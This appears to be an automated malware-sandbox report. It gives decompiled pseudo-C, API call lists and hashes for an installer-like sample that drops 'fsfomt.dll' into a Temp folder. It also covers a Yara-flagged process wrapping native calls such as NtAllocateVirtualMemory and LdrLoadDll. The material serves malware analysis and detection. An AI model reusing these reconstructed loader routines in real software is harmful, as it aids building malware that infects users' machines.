                                                                        				 *0x4093e8 = E00402A7D(3);                                     // lfWeight from the third integer argument
                                                                        				_t11 =  *((intOrPtr*)(_t28 - 0x14));                            // style flag bits
                                                                        				 *0x4093ef = 1;                                                 // lfCharSet = DEFAULT_CHARSET
                                                                        				 *0x4093ec = _t11 & 0x00000001;                                 // lfItalic
                                                                        				 *0x4093ed = _t11 & 0x00000002;                                 // lfUnderline
                                                                        				 *0x4093ee = _t11 & 0x00000004;                                 // lfStrikeOut
                                                                        				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));   // copy the face name argument into lfFaceName
                                                                        				_t14 = CreateFontIndirectA(0x4093d8);
                                                                        				_push(_t14);
                                                                        				_push(_t26);
                                                                        				E0040591D();                                                    // store the HFONT as a decimal string (E0040591D wraps wsprintfA, per the E00401F4B API list)
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));            // accumulate the error flag in a global counter
                                                                        				return 0;
                                                                        			}


                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401D95
                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                                                        • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirect
                                                                        • String ID:
                                                                        • API String ID: 3272661963-0
                                                                        • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                        • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
                                                                        • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                        • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                        				int _t19;
                                                                        				long _t23;
                                                                        
                                                                        				if(_a8 != 0x102) {
                                                                        					__eflags = _a8 - 2;
                                                                        					if(_a8 == 2) {
                                                                        						 *0x40929c =  *0x40929c | 0xffffffff;
                                                                        						__eflags =  *0x40929c;
                                                                        					}
                                                                        					__eflags = _a8 - 0x200;
                                                                        					if(_a8 != 0x200) {
                                                                        						_t23 = _a16;
                                                                        						goto L9;
                                                                        					} else {
                                                                        						_t19 = IsWindowVisible(_a4);
                                                                        						__eflags = _t19;
                                                                        						if(_t19 == 0) {
                                                                        							L12:
                                                                        							_t23 = _a16;
                                                                        							L13:
                                                                        							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
                                                                        						}
                                                                        						_t23 = E00404627(_a4, 1);
                                                                        						_a8 = 0x419;
                                                                        						L9:
                                                                        						__eflags = _a8 - 0x419;
                                                                        						if(_a8 == 0x419) {
                                                                        							__eflags =  *0x40929c - _t23; // 0xffffffff
                                                                        							if(__eflags != 0) {
                                                                        								 *0x40929c = _t23;
                                                                        								E004059BF(0x79f580, 0x7a4000);
                                                                        								E0040591D(0x7a4000, _t23);
                                                                        								E00401410(6);
                                                                        								E004059BF(0x7a4000, 0x79f580);
                                                                        							}
                                                                        						}
                                                                        						goto L13;
                                                                        					}
                                                                        				}
                                                                        				if(_a12 == 0x20) {
                                                                        					E00403DF3(0x413);
                                                                        					return 0;
                                                                        				}
                                                                        				goto L12;
                                                                        			}
                                                                        0x00404cad
                                                                        0x00404cca
                                                                        0x00404cce
                                                                        0x00404cd0
                                                                        0x00404cd0
                                                                        0x00404cd0
                                                                        0x00404cd7
                                                                        0x00404ce3
                                                                        0x00404d03
                                                                        0x00000000
                                                                        0x00404ce5
                                                                        0x00404ce8
                                                                        0x00404cee
                                                                        0x00404cf0
                                                                        0x00404d43
                                                                        0x00404d43
                                                                        0x00404d46
                                                                        0x00000000
                                                                        0x00404d56
                                                                        0x00404cfc
                                                                        0x00404cfe
                                                                        0x00404d06
                                                                        0x00404d06
                                                                        0x00404d09
                                                                        0x00404d0b
                                                                        0x00404d11
                                                                        0x00404d20
                                                                        0x00404d26
                                                                        0x00404d2d
                                                                        0x00404d34
                                                                        0x00404d3b
                                                                        0x00404d40
                                                                        0x00404d11
                                                                        0x00000000
                                                                        0x00404d09
                                                                        0x00404ce3
                                                                        0x00404cb3
                                                                        0x00404cbe
                                                                        0x00000000
                                                                        0x00404cc3
                                                                        0x00000000

                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00404CE8
                                                                        • CallWindowProcA.USER32 ref: 00404D56
                                                                          • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                        • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
                                                                        • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                        • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                        				int _t5;
                                                                        				long _t7;
                                                                        				struct _OVERLAPPED* _t11;
                                                                        				intOrPtr* _t15;
                                                                        				void* _t17;
                                                                        				int _t21;
                                                                        
                                                                        				_t15 = __esi;
                                                                        				_t11 = __ebx;
                                                                        				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                                        					_t7 = lstrlenA(E00402A9A(0x11));
                                                                        				} else {
                                                                        					E00402A7D(1);
                                                                        					 *0x40a018 = __al;
                                                                        				}
                                                                        				if( *_t15 == _t11) {
                                                                        					L8:
                                                                        					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                        				} else {
                                                                        					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll", _t7, _t17 + 8, _t11);
                                                                        					_t21 = _t5;
                                                                        					if(_t21 == 0) {
                                                                        						goto L8;
                                                                        					}
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
                                                                        				return 0;
                                                                        			}
                                                                        0x0040253c
                                                                        0x0040253c
                                                                        0x0040253f
                                                                        0x0040255a
                                                                        0x00402541
                                                                        0x00402543
                                                                        0x00402548
                                                                        0x0040254f
                                                                        0x00402561
                                                                        0x004026da
                                                                        0x004026da
                                                                        0x00402567
                                                                        0x00402579
                                                                        0x004015c8
                                                                        0x004015ca
                                                                        0x00000000
                                                                        0x004015d0
                                                                        0x004015ca
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll, xrefs: 00402548, 0040256D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileWritelstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
                                                                        • API String ID: 427699356-1876267922
                                                                        • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                        • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
                                                                        • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                        • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405513(char* _a4) {
                                                                        				char* _t3;
                                                                        				char* _t4;
                                                                        
                                                                        				_t4 = _a4;
                                                                        				_t3 =  &(_t4[lstrlenA(_t4)]);
                                                                        				while( *_t3 != 0x5c) {
                                                                        					_t3 = CharPrevA(_t4, _t3);
                                                                        					if(_t3 > _t4) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				 *_t3 =  *_t3 & 0x00000000;
                                                                        				return _t3;
                                                                        			}
                                                                        0x00405514
                                                                        0x0040551e
                                                                        0x00405520
                                                                        0x00405527
                                                                        0x0040552f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040552f
                                                                        0x00405531
                                                                        0x00405535

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\Users\user\Desktop
                                                                        • API String ID: 2709904686-224404859
                                                                        • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                        • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
                                                                        • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                        • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405624(CHAR* _a4, CHAR* _a8) {
                                                                        				int _t10;
                                                                        				int _t15;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t15 = lstrlenA(_a8);
                                                                        				_t16 = _a4;
                                                                        				while(lstrlenA(_t16) >= _t15) {
                                                                        					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                        					_t10 = lstrcmpiA(_t16, _a8);
                                                                        					if(_t10 == 0) {
                                                                        						return _t16;
                                                                        					}
                                                                        					_t16 = CharNextA(_t16);
                                                                        				}
                                                                        				return 0;
                                                                        			}
                                                                        0x00405630
                                                                        0x00405632
                                                                        0x0040565a
                                                                        0x0040563f
                                                                        0x00405644
                                                                        0x0040564f
                                                                        0x00000000
                                                                        0x0040566c
                                                                        0x00405658
                                                                        0x00405658
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
                                                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                        • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
                                                                        • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                        • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        C-Code - Quality: 37%
                                                                        			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                        				void* _t18;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        
                                                                        				_t13 = _a4;
                                                                        				_t28 = _a4 + 0xc48;
                                                                        				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                        				_t6 =  &_a32; // 0x413d42
                                                                        				_t12 =  &_a8; // 0x413d42
                                                                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                        				return _t18;
                                                                        			}

                                                                        Instruction addresses: 0x00418263, 0x0041826f, 0x00418277, 0x00418282, 0x0041829d, 0x004182a5, 0x004182a9

                                                                        APIs
                                                                        • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: B=A$B=A
                                                                        • API String ID: 2738559852-2767357659
                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                        				char* _v8;
                                                                        				struct _EXCEPTION_RECORD _v12;
                                                                        				struct _OBJDIR_INFORMATION _v16;
                                                                        				char _v536;
                                                                        				void* _t15;
                                                                        				struct _OBJDIR_INFORMATION _t17;
                                                                        				struct _OBJDIR_INFORMATION _t18;
                                                                        				void* _t30;
                                                                        				void* _t31;
                                                                        				void* _t32;
                                                                        
                                                                        				_v8 =  &_v536;
                                                                        				_t15 = E0041AB40( &_v12, 0x104, _a8);
                                                                        				_t31 = _t30 + 0xc;
                                                                        				if(_t15 != 0) {
                                                                        					_t17 = E0041AF60(__eflags, _v8);
                                                                        					_t32 = _t31 + 4;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						E0041B1E0( &_v12, 0);
                                                                        						_t32 = _t32 + 8;
                                                                        					}
                                                                        					_t18 = E004192F0(_v8);
                                                                        					_v16 = _t18;
                                                                        					__eflags = _t18;
                                                                        					if(_t18 == 0) {
                                                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                        						return _v16;
                                                                        					}
                                                                        					return _t18;
                                                                        				} else {
                                                                        					return _t15;
                                                                        				}
                                                                        			}

                                                                        Instruction addresses: 0x00409b2c, 0x00409b2f, 0x00409b34, 0x00409b39, 0x00409b43, 0x00409b48, 0x00409b4b, 0x00409b4d, 0x00409b55, 0x00409b5a, 0x00409b5a, 0x00409b61, 0x00409b69, 0x00409b6c, 0x00409b6e, 0x00409b82, 0x00000000, 0x00409b84, 0x00409b8a, 0x00409b3e, 0x00409b3e, 0x00409b3e

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                        				long _t21;
                                                                        				void* _t31;
                                                                        
                                                                        				_t3 = _a4 + 0xc40; // 0xc40
                                                                        				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                        				return _t21;
                                                                        			}

                                                                        Instruction addresses: 0x004181bf, 0x004181c7, 0x004181fd, 0x00418201

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                        				long _t14;
                                                                        				void* _t21;
                                                                        
                                                                        				_t3 = _a4 + 0xc60; // 0xca0
                                                                        				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                        				return _t14;
                                                                        			}

                                                                        Instruction addresses: 0x0041839f, 0x004183a7, 0x004183c9, 0x004183cd

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E004182DC(void* __eax, void* __ebx, intOrPtr _a4, void* _a8) {
                                                                        				long _t10;
                                                                        				void* _t14;
                                                                        
                                                                        				asm("lds ebx, [ebp+0x55]");
                                                                        				_t7 = _a4;
                                                                        				_t2 = _t7 + 0x10; // 0x300
                                                                        				_t3 = _t7 + 0xc50; // 0x409733
                                                                        				E00418DB0(_t14, _a4, _t3,  *_t2, 0, 0x2c);
                                                                        				_t10 = NtClose(_a8); // executed
                                                                        				return _t10;
                                                                        			}

                                                                        Instruction addresses: 0x004182de, 0x004182e3, 0x004182e6, 0x004182ef, 0x004182f7, 0x00418305, 0x00418309

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 28c77184fe95edaf1826af25dc0f66afdfade83a195358f500431b5d572c955f
                                                                        • Instruction ID: 56edd341266eb60943566afae013ad589115b806c830ca89e2ff7e7fbee49b49
                                                                        • Opcode Fuzzy Hash: 28c77184fe95edaf1826af25dc0f66afdfade83a195358f500431b5d572c955f
                                                                        • Instruction Fuzzy Hash: 98E0C236240314ABDB10EFD4CC85EDB3768EF48310F144059BE585B342CA30E90087D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004182E0(intOrPtr _a4, void* _a8) {
                                                                        				long _t8;
                                                                        				void* _t11;
                                                                        
                                                                        				_t5 = _a4;
                                                                        				_t2 = _t5 + 0x10; // 0x300
                                                                        				_t3 = _t5 + 0xc50; // 0x409733
                                                                        				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                        				_t8 = NtClose(_a8); // executed
                                                                        				return _t8;
                                                                        			}

                                                                        Instruction addresses: 0x004182e3, 0x004182e6, 0x004182ef, 0x004182f7, 0x00418305, 0x00418309

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 84136e98b8c539dcdc7bc1152f04e11a8c236a8929089585bdc33f02b7a8284b
                                                                        • Instruction ID: f09df2499df8cd06342f466bad1ea290f80e2b0de04fcdece786d66633cd5a27
                                                                        • Opcode Fuzzy Hash: 84136e98b8c539dcdc7bc1152f04e11a8c236a8929089585bdc33f02b7a8284b
                                                                        • Instruction Fuzzy Hash: FC90026160101502D20171694404656040A97D0381F91C432A1014555ECA6589D2F1B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5725289bf9cb9a18bbac1d13960834bbe7db35d50ce7199407658aa744bb3935
                                                                        • Instruction ID: 8cda8a290229feab99281d60757bf8eee6e2f6044de430cbcb682a4c55ad418c
